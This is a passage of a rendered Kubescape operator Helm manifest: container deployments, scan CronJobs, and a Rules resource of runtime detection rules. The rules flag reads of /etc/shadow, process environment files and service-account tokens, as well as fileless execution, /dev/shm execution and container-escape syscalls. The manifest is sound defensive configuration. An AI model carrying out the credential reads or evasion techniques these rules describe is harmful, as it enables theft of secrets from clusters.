KS_LOGGER_LEVEL + value: info + - name: KS_LOGGER_NAME + value: zap + - name: PRINT_POST_JSON + value: '' + - name: CA_MAX_VULN_SCAN_ROUTINES + value: '1' + args: + - -alsologtostderr + - -v=4 + volumeMounts: + - name: cloud-secret + mountPath: /etc/credentials + readOnly: true + - name: tmp-dir + mountPath: /tmp + - name: grype-db-cache + mountPath: /home/nonroot/anchore-resources/db + - name: ks-cloud-config + mountPath: /etc/config/clusterData.json + readOnly: true + subPath: clusterData.json + - name: grype-db + mountPath: /home/nonroot/.cache/grype + volumes: + - name: cloud-secret + secret: + secretName: cloud-secret + - name: tmp-dir + emptyDir: {} + - name: grype-db-cache + emptyDir: {} + - name: ks-cloud-config + configMap: + name: ks-cloud-config + items: + - key: clusterData + path: clusterData.json + - name: grype-db + emptyDir: {} + serviceAccountName: kubevuln + automountServiceAccountToken: true + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: operator + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +spec: + replicas: 1 + revisionHistoryLimit: 2 + strategy: + rollingUpdate: + maxSurge: 0% + maxUnavailable: 100% + type: RollingUpdate + selector: + matchLabels: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + template: + metadata: + annotations: + checksum/operator-config: 4390a54f76466bfe8f7b90c12e53ada738e0cbc316cd132c17604a94c3b6d885 + checksum/cloud-secret: fd7d2ee3b19c0318d4630577e36a743e2e6840df1d6bfa09b147bdf94c70ccc2 + checksum/cloud-config: c91497d8f6fbf920f47b897ff4620129dbf7fa380bea096144c50298cc023996 + checksum/capabilities-config: 6de901b4ead657e549bb9a6eef97eb55bbed2e0508a7a1875d2a48c9b29c0402 + checksum/matching-rules-config: 061617180b4f2780bd091c456b13a4b789654739862e082e4ad357c3ed226561 + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + runAsUser: 65532 + fsGroup: 65532 + containers: + - name: operator + image: quay.io/kubescape/operator:v0.2.121 + imagePullPolicy: IfNotPresent + securityContext: + allowPrivilegeEscalation: false + readOnlyRootFilesystem: true + runAsNonRoot: true + ports: + - name: trigger-port + containerPort: 4002 + protocol: TCP + - name: readiness-port + containerPort: 8000 + protocol: TCP + - name: admission-port + containerPort: 8443 + protocol: TCP + livenessProbe: + httpGet: + path: /v1/liveness + port: readiness-port + initialDelaySeconds: 3 + periodSeconds: 3 + readinessProbe: + httpGet: + path: /v1/readiness + port: readiness-port + initialDelaySeconds: 10 + periodSeconds: 5 + resources: + limits: + cpu: 300m + memory: 300Mi + requests: + cpu: 50m + memory: 100Mi + env: + - name:
NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + - name: HELM_RELEASE + value: kubescape-operator-1.30.2 + - name: GOMEMLIMIT + valueFrom: + resourceFieldRef: + resource: limits.memory + divisor: '1' + - name: GOMAXPROCS + valueFrom: + resourceFieldRef: + resource: limits.cpu + divisor: '1' + - name: KS_LOGGER_LEVEL + value: info + - name: KS_LOGGER_NAME + value: zap + volumeMounts: + - name: cloud-secret + mountPath: /etc/credentials + readOnly: true + - name: tmp-dir + mountPath: /tmp + - name: ks-cloud-config + mountPath: /etc/config/clusterData.json + readOnly: true + subPath: clusterData.json + - name: ks-capabilities + mountPath: /etc/config/capabilities.json + readOnly: true + subPath: capabilities.json + - name: cs-matching-rules + mountPath: /etc/config/matchingRules.json + readOnly: true + subPath: matchingRules.json + - name: config + mountPath: /etc/config/config.json + readOnly: true + subPath: config.json + - name: tls-certs + mountPath: /etc/certs + readOnly: true + volumes: + - name: cloud-secret + secret: + secretName: cloud-secret + - name: tls-certs + secret: + secretName: kubescape-admission-webhook.honey.svc-kubescape-tls-pair + - name: tmp-dir + emptyDir: {} + - name: ks-cloud-config + configMap: + name: ks-cloud-config + items: + - key: clusterData + path: clusterData.json + - name: ks-capabilities + configMap: + name: ks-capabilities + items: + - key: capabilities + path: capabilities.json + - name: config + configMap: + name: operator + items: + - key: config.json + path: config.json + - name: cs-matching-rules + configMap: + name: cs-matching-rules + items: + - key: matchingRules.json + path: matchingRules.json + serviceAccountName: operator + automountServiceAccountToken: true + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: prometheus-exporter + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: prometheus-exporter + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + replicas: 1 + revisionHistoryLimit: 2 + strategy: + type: Recreate + selector: + matchLabels: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + template: + metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: prometheus-exporter + tier: ks-control-plane + kubescape.io/ignore: 'true' + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + runAsUser: 65532 + fsGroup: 65532 + containers: + - name: prometheus-exporter + image: quay.io/kubescape/prometheus-exporter:v0.2.11 + imagePullPolicy: IfNotPresent + securityContext: + allowPrivilegeEscalation: false + readOnlyRootFilesystem: true + runAsNonRoot: true + ports: + - name: metrics + containerPort: 8080 + protocol: TCP + livenessProbe: + tcpSocket: + port: 8080 + initialDelaySeconds: 3 + periodSeconds: 3 + readinessProbe: + tcpSocket: + port: 8080 + resources: + 
limits: + cpu: 50m + memory: 100Mi + requests: + cpu: 10m + memory: 10Mi + env: + - name: GOMEMLIMIT + valueFrom: + resourceFieldRef: + resource: limits.memory + divisor: '1' + - name: GOMAXPROCS + valueFrom: + resourceFieldRef: + resource: limits.cpu + divisor: '1' + - name: KS_LOGGER_LEVEL + value: info + - name: KS_LOGGER_NAME + value: zap + volumeMounts: + - name: ks-cloud-config + mountPath: /etc/config + readOnly: true + volumes: + - name: ks-cloud-config + configMap: + name: ks-cloud-config + items: + - key: clusterData + path: clusterData.json + serviceAccountName: prometheus-exporter + automountServiceAccountToken: true + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: storage + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +spec: + replicas: 1 + revisionHistoryLimit: 2 + strategy: + type: Recreate + selector: + matchLabels: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + template: + metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + spec: + serviceAccountName: storage + securityContext: + seccompProfile: + type: RuntimeDefault + runAsUser: 65532 + fsGroup: 65532 + containers: + - name: apiserver + image: ghcr.io/k8sstormcenter/storage:dev-e64d59a + imagePullPolicy: IfNotPresent + securityContext: + allowPrivilegeEscalation: false + runAsNonRoot: true + livenessProbe: + httpGet: + path: /livez + port: 8443 + scheme: HTTPS + readinessProbe: + httpGet: + path: /readyz + port: 8443 + scheme: HTTPS + env: + - name: GOMEMLIMIT + valueFrom: + resourceFieldRef: + resource: limits.memory + divisor: '1' + - name: GOMAXPROCS + valueFrom: + resourceFieldRef: + resource: limits.cpu + divisor: '1' + - name: KS_LOGGER_LEVEL + value: info + - name: KS_LOGGER_NAME + value: zap + volumeMounts: + - name: data + mountPath: /data + - name: ks-cloud-config + mountPath: /etc/config/clusterData.json + readOnly: true + subPath: clusterData.json + - name: config + mountPath: /etc/config/config.json + readOnly: true + subPath: config.json + - name: ca-certificates + mountPath: /etc/storage-ca-certificates + readOnly: true + resources: + limits: + cpu: 1500m + memory: 1500Mi + requests: + cpu: 100m + memory: 400Mi + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null + volumes: + - name: data + persistentVolumeClaim: + claimName: kubescape-storage + - name: ks-cloud-config + configMap: + name: ks-cloud-config + items: + - key: clusterData + path: clusterData.json + - name: config + configMap: + name: storage + items: + - key: config.json + path: config.json + - name: ca-certificates + secret: + secretName: storage-ca +--- +apiVersion: batch/v1 +kind: CronJob +metadata: + name: 
kubescape-scheduler + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape-scheduler + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape-scheduler + tier: ks-control-plane + kubescape.io/ignore: 'true' + armo.tier: kubescape-scan + kubescape.io/tier: core +spec: + schedule: 12 21 * * * + successfulJobsHistoryLimit: 3 + failedJobsHistoryLimit: 1 + jobTemplate: + spec: + template: + metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape-scheduler + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape-scheduler + tier: ks-control-plane + kubescape.io/ignore: 'true' + armo.tier: kubescape-scan + kubescape.io/tier: core + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + containers: + - name: kubescape-scheduler + image: quay.io/kubescape/http-request:v0.2.16 + imagePullPolicy: IfNotPresent + resources: + limits: + cpu: 10m + memory: 20Mi + requests: + cpu: 1m + memory: 10Mi + securityContext: + allowPrivilegeEscalation: false + readOnlyRootFilesystem: true + runAsNonRoot: true + runAsUser: 100 + args: + - -method=post + - -scheme=http + - -host=operator:4002 + - -path=v1/triggerAction + - -headers=Content-Type:application/json + - -path-body=/home/ks/request-body.json + volumeMounts: + - name: kubescape-scheduler + mountPath: /home/ks/request-body.json + subPath: request-body.json + readOnly: true + restartPolicy: Never + serviceAccountName: kubescape + automountServiceAccountToken: false + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null + volumes: + - name: kubescape-scheduler + configMap: + name: kubescape-scheduler +--- +apiVersion: batch/v1 +kind: CronJob +metadata: + name: kubevuln-scheduler + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln-scheduler + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln-scheduler + tier: ks-control-plane + kubescape.io/ignore: 'true' + armo.tier: vuln-scan + kubescape.io/tier: core +spec: + schedule: 24 0 * * * + successfulJobsHistoryLimit: 3 + failedJobsHistoryLimit: 1 + jobTemplate: + spec: + template: + metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln-scheduler + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln-scheduler + tier: ks-control-plane + kubescape.io/ignore: 'true' + armo.tier: vuln-scan + kubescape.io/tier: core + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + containers: + - name: kubevuln-scheduler + image: quay.io/kubescape/http-request:v0.2.16 + imagePullPolicy: IfNotPresent + resources: + limits: + cpu: 10m + memory: 20Mi + requests: + cpu: 1m + memory: 10Mi + securityContext: + allowPrivilegeEscalation: false + readOnlyRootFilesystem: true + 
runAsNonRoot: true + runAsUser: 100 + args: + - -method=post + - -scheme=http + - -host=operator:4002 + - -path=v1/triggerAction + - -headers=Content-Type:application/json + - -path-body=/home/ks/request-body.json + volumeMounts: + - name: kubevuln-scheduler + mountPath: /home/ks/request-body.json + subPath: request-body.json + readOnly: true + restartPolicy: Never + serviceAccountName: kubevuln + automountServiceAccountToken: false + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null + volumes: + - name: kubevuln-scheduler + configMap: + name: kubevuln-scheduler +--- +apiVersion: apiregistration.k8s.io/v1 +kind: APIService +metadata: + name: v1beta1.spdx.softwarecomposition.kubescape.io + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + group: spdx.softwarecomposition.kubescape.io + groupPriorityMinimum: 1000 + versionPriority: 15 + version: v1beta1 + service: + name: storage + namespace: honey + caBundle: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURMRENDQWhTZ0F3SUJBZ0lSQUpiWTBacHczMnRPYkE3bkJOQVErcVl3RFFZSktvWklodmNOQVFFTEJRQXcKSURFZU1Cd0dBMVVFQXhNVmMzUnZjbUZuWlMwMFV6VkhVM0ZaVG1JNUxXTmhNQjRYRFRJMk1EUXlOVEEyTXpVeApPRm9YRFRJNE1EUXlOREEyTXpVeE9Gb3dJREVlTUJ3R0ExVUVBeE1WYzNSdmNtRm5aUzAwVXpWSFUzRlpUbUk1CkxXTmhNSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQTMyNnJ0T3ZnaUJqR3ZYZ0wKZWdXdFlTVUZ3M2tNL2tmL3kraWx6TWdwSUIvSnpIZG1jc2M1VVk0RUxYRTdYQllVb1FiL3ZJWmxnNWFNWmt1ZAovT2VncnN1VHVtRWNWRllienpleUtmL0wzSEM5SXZsQzN1d0FzREVyTENHaCs1TmdYc2dkdi9BYjVGNTg0Q21VCnlUUzl2aklFNTYrbmJWQVdnUTVYY3dRQ0xrTGFocitKck1yL0FoYzdRTVNLdXdnK0tOZlBWTWNSWmk3U2pqTXcKNXcvSllxR2k5N0h3a3NzbnZjcWRmb01NKzlCV0pxRndIdlFiaG1Ub2twbm13VVkzNTFEK3ZwZGZOaE5ObG5JeQoyQS9ocWVNOHg2WmYraW1mb2NnWTVtUWcwQkowQzVCTDgrN3BMN29kR2FxWmdkNXpKeTBLVFJPbktmdS96clJQClo4WjJZUUlEQVFBQm8yRXdYekFPQmdOVkhROEJBZjhFQkFNQ0FxUXdIUVlEVlIwbEJCWXdGQVlJS3dZQkJRVUgKQXdFR0NDc0dBUVVGQndNQ01BOEdBMVVkRXdFQi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZFcENZcU9aUXFUbgpOeGFCZDYwOEVTNGRoR3Y3TUEwR0NTcUdTSWIzRFFFQkN3VUFBNElCQVFBd29lRUQxOTZlWFZuay9IK3FDM0Z5CjJXSXJZNzRvVElhU3prYTd1UUd2RzlwOUcxdW5sZHdrUUFlckVjUWpHVDdwcmd1VlkxRlQ0ZUxuQzRSeVF2VG8KY3JGVUFPdTRCVEhsaXFmNGUveXBFWFhVbDltanVJK3hBSDJrUWdXOElpSXFVc1dSYmc2cEtqdCtaL25uVytWbQp5QkNHZzBBSFE3UmJBME5MTVJHOFArYkt4eDRwUlFDQlZHbndnbmk4VnVWVjNkTXYvMHdIbG8rRFRSd3d3eStNCnFOcE1BM0ROeURxQVhYK3Z6RlpKMk1oSlpGcDcvQTVTb3g2cVVKM1V1elpzcjZIeWs0dTA4cHdYMUltK01WbmYKaUd3R1lXT1BEQVl3Zkc3c04rbmZTUklCMUNxbXhHdnNxaktoeWRUbVkwVjFPaGtpbUZybEc4QmErMHQ3SHN3cgotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg== +--- +apiVersion: scheduling.k8s.io/v1 +kind: PriorityClass +metadata: + name: kubescape-critical + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape-critical + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape-critical + tier: ks-control-plane + kubescape.io/ignore: 'true' +value: 100000100 +globalDefault: false +description: This priority class is for node-agent daemonset pods +--- +apiVersion: kubescape.io/v1 +kind: Rules +metadata: + name: default-rules + namespace: honey + annotations:
null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + rules: + - name: Unexpected process launched + enabled: true + id: R0001 + description: Detects unexpected process launches that are not in the baseline + expressions: + message: '''Unexpected process launched: '' + event.comm + '' with PID '' + + string(event.pid)' + uniqueId: event.comm + '_' + event.exepath + ruleExpression: + - eventType: exec + expression: '!ap.was_executed(event.containerId, parse.get_exec_path(event.args, + event.comm))' + profileDependency: 0 + severity: 1 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1059 + tags: + - anomaly + - process + - exec + - applicationprofile + - name: Files Access Anomalies in container + enabled: false + id: R0002 + description: Detects unexpected file access that is not in the baseline + expressions: + message: '''Unexpected file access detected: '' + event.comm + '' with PID '' + + string(event.pid) + '' to '' + event.path' + uniqueId: event.comm + '_' + event.path + ruleExpression: + - eventType: open + expression: "(event.path.startsWith('/etc/') || event.path.startsWith('/var/log/')\ + \ || event.path.startsWith('/var/run/') || event.path.startsWith('/run/')\ + \ || event.path.startsWith('/var/spool/cron/') || event.path.startsWith('/var/www/')\ + \ || event.path.startsWith('/var/lib/') || event.path.startsWith('/opt/')\ + \ || event.path.startsWith('/usr/local/') || event.path.startsWith('/app/')\ + \ || event.path == '/.dockerenv' || event.path == '/proc/self/environ')\ + \ && !(event.path.startsWith('/run/secrets/kubernetes.io/serviceaccount')\ + \ ||\n event.path.startsWith('/var/run/secrets/kubernetes.io/serviceaccount')\ + \ ||\n event.path.startsWith('/tmp'))\n&& !ap.was_path_opened(event.containerId,\ + \ event.path)\n" + profileDependency: 0 + severity: 1 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0009 + mitreTechnique: T1005 + tags: + - anomaly + - file + - open + - applicationprofile + - name: Syscalls Anomalies in container + enabled: true + id: R0003 + description: Detects unexpected system calls that are not whitelisted by application + profile + expressions: + message: '''Unexpected system call detected: '' + event.syscallName + '' with + PID '' + string(event.pid)' + uniqueId: event.syscallName + ruleExpression: + - eventType: syscall + expression: '!ap.was_syscall_used(event.containerId, event.syscallName)' + profileDependency: 0 + severity: 1 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0002 + mitreTechnique: T1059 + tags: + - anomaly + - syscall + - applicationprofile + - name: Linux Capabilities Anomalies in container + enabled: true + id: R0004 + description: Detects unexpected capabilities that are not whitelisted by application + profile + expressions: + message: '''Unexpected capability used: '' + event.capName + '' in syscall '' + + event.syscallName + '' with PID '' + string(event.pid)' + uniqueId: event.comm + '_' + event.capName + ruleExpression: + - eventType: capabilities + expression: '!ap.was_capability_used(event.containerId, event.capName)' + profileDependency: 0 + severity: 1 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0002 + 
mitreTechnique: T1059 + tags: + - anomaly + - capabilities + - applicationprofile + - name: DNS Anomalies in container + enabled: true + id: R0005 + description: Detecting unexpected domain requests that are not whitelisted by + application profile. + expressions: + message: '''Unexpected domain communication: '' + event.name + '' from: '' + + event.containerName' + uniqueId: event.comm + '_' + event.name + ruleExpression: + - eventType: dns + expression: '!event.name.endsWith(''.svc.cluster.local.'') && !nn.is_domain_in_egress(event.containerId, + event.name)' + profileDependency: 0 + severity: 1 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0011 + mitreTechnique: T1071.004 + tags: + - dns + - anomaly + - networkprofile + - name: Unexpected service account token access + enabled: true + id: R0006 + description: Detecting unexpected access to service account token. + expressions: + message: '''Unexpected access to service account token: '' + event.path + '' + with flags: '' + event.flags.join('','')' + uniqueId: event.comm + ruleExpression: + - eventType: open + expression: "((event.path.startsWith('/run/secrets/kubernetes.io/serviceaccount')\ + \ && event.path.endsWith('/token')) || \n (event.path.startsWith('/var/run/secrets/kubernetes.io/serviceaccount')\ + \ && event.path.endsWith('/token')) ||\n (event.path.startsWith('/run/secrets/eks.amazonaws.com/serviceaccount')\ + \ && event.path.endsWith('/token')) ||\n (event.path.startsWith('/var/run/secrets/eks.amazonaws.com/serviceaccount')\ + \ && event.path.endsWith('/token'))) &&\n!ap.was_path_opened_with_suffix(event.containerId,\ + \ '/token')\n" + profileDependency: 0 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1528 + tags: + - anomaly + - serviceaccount + - applicationprofile + - name: Workload uses Kubernetes API unexpectedly + enabled: true + id: R0007 + description: Detecting execution of kubernetes client + expressions: + message: 'eventType == ''exec'' ? ''Kubernetes client ('' + event.comm + '') + was executed with PID '' + string(event.pid) : ''Network connection to Kubernetes + API server from container '' + event.containerName' + uniqueId: 'eventType == ''exec'' ? ''exec_'' + event.comm : ''network_'' + event.dstAddr' + ruleExpression: + - eventType: exec + expression: (event.comm == 'kubectl' || event.exepath.endsWith('/kubectl')) + && !ap.was_executed(event.containerId, parse.get_exec_path(event.args, event.comm)) + - eventType: network + expression: event.pktType == 'OUTGOING' && k8s.is_api_server_address(event.dstAddr) + && !nn.was_address_in_egress(event.containerId, event.dstAddr) + profileDependency: 0 + severity: 5 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0008 + mitreTechnique: T1210 + tags: + - exec + - network + - anomaly + - applicationprofile + - name: Read Environment Variables from procfs + enabled: true + id: R0008 + description: Detecting reading environment variables from procfs. 
+ expressions: + message: '''Reading environment variables from procfs: '' + event.path + '' + by process '' + event.comm' + uniqueId: event.comm + '_' + event.path + ruleExpression: + - eventType: open + expression: 'event.path.startsWith(''/proc/'') && event.path.endsWith(''/environ'') + && !ap.was_path_opened_with_suffix(event.containerId, ''/environ'') + + ' + profileDependency: 0 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1552.001 + tags: + - anomaly + - procfs + - environment + - applicationprofile + - name: eBPF Program Load + enabled: true + id: R0009 + description: Detecting eBPF program load. + expressions: + message: '''bpf program load system call (bpf) was called by process ('' + event.comm + + '') with command (BPF_PROG_LOAD)''' + uniqueId: event.comm + '_' + 'bpf' + '_' + string(event.cmd) + ruleExpression: + - eventType: bpf + expression: event.cmd == uint(5) && !ap.was_syscall_used(event.containerId, + 'bpf') + profileDependency: 1 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1218 + tags: + - bpf + - ebpf + - applicationprofile + - name: Unexpected Sensitive File Access + enabled: true + id: R0010 + description: Detecting access to sensitive files. + expressions: + message: '''Unexpected sensitive file access: '' + event.path + '' by process + '' + event.comm' + uniqueId: event.comm + '_' + event.path + ruleExpression: + - eventType: open + expression: event.path.startsWith('/etc/shadow') && !ap.was_path_opened(event.containerId, + event.path) + profileDependency: 1 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1005 + tags: + - files + - anomaly + - applicationprofile + - name: Unexpected Egress Network Traffic + enabled: false + id: R0011 + description: Detecting unexpected egress network traffic that is not whitelisted + by application profile. 
+ expressions: + message: '''Unexpected egress network communication to: '' + event.dstAddr + + '':'' + string(event.dstPort) + '' using '' + event.proto + '' from: '' + + event.containerName' + uniqueId: event.dstAddr + '_' + string(event.dstPort) + '_' + event.proto + ruleExpression: + - eventType: network + expression: event.pktType == 'OUTGOING' && !net.is_private_ip(event.dstAddr) + && !nn.was_address_in_egress(event.containerId, event.dstAddr) + profileDependency: 0 + severity: 5 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0010 + mitreTechnique: T1041 + tags: + - whitelisted + - network + - anomaly + - networkprofile + - name: Process executed from malicious source + enabled: true + id: R1000 + description: 'Detecting exec calls that are from malicious source like: /dev/shm' + expressions: + message: '''Execution from malicious source: '' + event.exepath + '' in directory + '' + event.cwd' + uniqueId: event.comm + '_' + event.exepath + '_' + event.pcomm + ruleExpression: + - eventType: exec + expression: '(event.exepath == ''/dev/shm'' || event.exepath.startsWith(''/dev/shm/'')) + || (event.cwd == ''/dev/shm'' || event.cwd.startsWith(''/dev/shm/'') || (parse.get_exec_path(event.args, + event.comm).startsWith(''/dev/shm/''))) + + ' + profileDependency: 2 + severity: 8 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1059 + tags: + - exec + - signature + - malicious + - name: Drifted process executed + enabled: true + id: R1001 + description: Detecting exec calls of binaries that are not included in the base + image + expressions: + message: '''Process ('' + event.comm + '') was executed and is not part of the + image''' + uniqueId: event.comm + '_' + event.exepath + '_' + event.pcomm + ruleExpression: + - eventType: exec + expression: "(event.upperlayer == true ||\n event.pupperlayer == true) &&\n\ + !ap.was_executed(event.containerId, parse.get_exec_path(event.args, event.comm))\n" + profileDependency: 1 + severity: 8 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1036 + tags: + - exec + - malicious + - binary + - base image + - applicationprofile + - name: Process tries to load a kernel module + enabled: true + id: R1002 + description: Detecting Kernel Module Load. 
+ expressions: + message: '''Kernel module ('' + event.module + '') loading attempt with syscall + ('' + event.syscallName + '') was called by process ('' + event.comm + '')''' + uniqueId: event.comm + '_' + event.syscallName + '_' + event.module + ruleExpression: + - eventType: kmod + expression: event.syscallName == 'init_module' || event.syscallName == 'finit_module' + profileDependency: 2 + severity: 10 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1547.006 + tags: + - kmod + - kernel + - module + - load + - name: Disallowed ssh connection + enabled: false + id: R1003 + description: Detecting ssh connection to disallowed port + expressions: + message: '''Malicious SSH connection attempt to '' + event.dstIp + '':'' + string(dyn(event.dstPort))' + uniqueId: event.comm + '_' + event.dstIp + '_' + string(dyn(event.dstPort)) + ruleExpression: + - eventType: ssh + expression: dyn(event.srcPort) >= 32768 && dyn(event.srcPort) <= 60999 && + !(dyn(event.dstPort) in [22, 2022]) && !nn.was_address_in_egress(event.containerId, + event.dstIp) + profileDependency: 1 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0008 + mitreTechnique: T1021.001 + tags: + - ssh + - connection + - port + - malicious + - networkprofile + - name: Process executed from mount + enabled: true + id: R1004 + description: Detecting exec calls from mounted paths. + expressions: + message: '''Process ('' + event.comm + '') was executed from a mounted path''' + uniqueId: event.comm + ruleExpression: + - eventType: exec + expression: '!ap.was_executed(event.containerId, parse.get_exec_path(event.args, + event.comm)) && k8s.get_container_mount_paths(event.namespace, event.podName, + event.containerName).exists(mount, event.exepath.startsWith(mount) || parse.get_exec_path(event.args, + event.comm).startsWith(mount))' + profileDependency: 1 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1059 + tags: + - exec + - mount + - applicationprofile + - name: Fileless execution detected + enabled: true + id: R1005 + description: Detecting Fileless Execution + expressions: + message: '''Fileless execution detected: exec call "'' + event.comm + ''" is + from a malicious source''' + uniqueId: event.comm + '_' + event.exepath + '_' + event.pcomm + ruleExpression: + - eventType: exec + expression: event.exepath.contains('memfd') || event.exepath.startsWith('/proc/self/fd') + || event.exepath.matches('/proc/[0-9]+/fd/[0-9]+') + profileDependency: 2 + severity: 8 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1055 + tags: + - fileless + - execution + - malicious + - name: Process tries to escape container + enabled: true + id: R1006 + description: Detecting Unshare System Call usage, which can be used to escape + container. + expressions: + message: '''Unshare system call (unshare) was called by process ('' + event.comm + + '')''' + uniqueId: event.comm + '_' + 'unshare' + ruleExpression: + - eventType: unshare + expression: event.pcomm != 'runc' && !ap.was_syscall_used(event.containerId, + 'unshare') + profileDependency: 2 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: 